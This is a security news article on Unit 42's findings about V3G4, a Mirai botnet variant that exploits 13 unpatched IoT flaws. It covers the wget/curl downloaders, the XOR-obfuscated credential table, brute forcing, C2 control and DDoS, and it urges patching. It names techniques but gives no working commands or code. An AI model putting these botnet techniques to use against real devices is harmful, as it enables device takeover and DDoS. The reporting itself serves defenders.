Unit 42 researchers have observed threat actors leveraging a Mirai botnet variant called V3G4 in three campaigns targeting 13 unpatched vulnerabilities found in a range of IoT devices to propagate. A successful exploit could lead to remote code execution.
The researchers examined these campaigns from July to December 2022 and found that, upon exploit, “the wget and curl utilities automatically executed to download Mirai client samples from malware infrastructure and then executed the downloaded bot clients.”
“V3G4 inherits its most significant feature from the original Mirai variant — a data section with embedded default login credentials for the scanner and brute force purposes,” according to researchers. “Like the original Mirai, it also encrypts all credentials with XOR key 0x37.”
Mirai is a well-known threat, known for evolving its tactics to exploit devices to its control and for expanding its botnet. Researchers have previously noted the variant leveraged effective brute forcing tactics and propagation techniques — highly effective for botnet operators.
The threat actors behind Mirai were most recently observed exploiting a known critical vulnerability, CVE-2022-46169, found in the Cacti device monitoring tool. The attacks aimed to deliver Mirai malware and a PERL-based IRC botnet. Successful exploits spurred the launch of a host-based reverse shell.
According to BleepingComputer, a new Mirai-based variant emerged in the last month to distribute the Medusa denial-of-service botnet. The campaign has been dubbed a malware-as-a-service for DDoS. However, the actors appear to be working out bugs in the variant.
In the latest campaigns, Unit42 found that once compromised by the V3G4 variant, the attackers are able to fully control the device and the platform becomes “part of the botnet.” That means the actor can use the device to conduct further attacks, including distributed denial-of-service (DDoS) attacks.
In the attempts observed by the researchers, the attacks used the known vulnerabilities to spread the V3G4 variant and targeted “exposed servers and networking devices running Linux.”
Further, V3G4 will then initialize the table of telnet/SSH login credentials in the scanner function, before spreading through brute forcing network devices that leverage weak username and password combinations.
Before the botnet client establishes a connection with the C2 server, the malware will first initialize all DDoS attack functions (shown in Figure 9). Once the client establishes a connection with the C2 server, the threat actor can issue commands to the client to launch DDoS attacks.
The IoT devices targeted in these campaigns included FreePBX Elastix, Gitorious, FRITZ!Box Webcam, Mitel AWC, Geutebruck IP Cameras, Webmin, Spree Commerce, FLIR Thermal Camera, DrayTek Vigor, Airspan AirSpot, Atlassian Confluence, and C-Data Web Management System. The research contains links to the original CVE disclosures.
The CVEs date as far back as 2012 and 2014, but also include several vulnerabilities reported in the last year. But all of the security bugs successfully targeted in these campaigns were left unpatched by the entity.
What’s more, these vulnerabilities have a lower attack complexity than observed with previously observed botnet variants, but still manage to “maintain a critical security impact” able to enable remote code execution. As such, the researchers are urging entities to patch or apply the software update if possible.
Researchers determined the campaigns were levied by the same threat actors. Forensic evidence revealed the use of the same hardcoded command and control (C2) domains, nearly identical malware shell script downloaders, and the same XOR decryption key used in each campaign.
The samples also showed the same “stop list,” or the “list of target processes that the botnet client searches for and terminates,” as well as nearly identical functions in each.
The tactics used in these campaigns aren’t new for Mirai, which is well known for its tactics that co-opt IoT devices for launching DDoS attacks. A spike in Mirai activity in February 2022 corresponded with the disclosure of Spring4Shell, a zero-day campaign on the Java web application framework, Spring Core.
Much like the recent campaigns, the previous attacks enabled unauthenticated remote code execution and further expanded the Mirai botnet.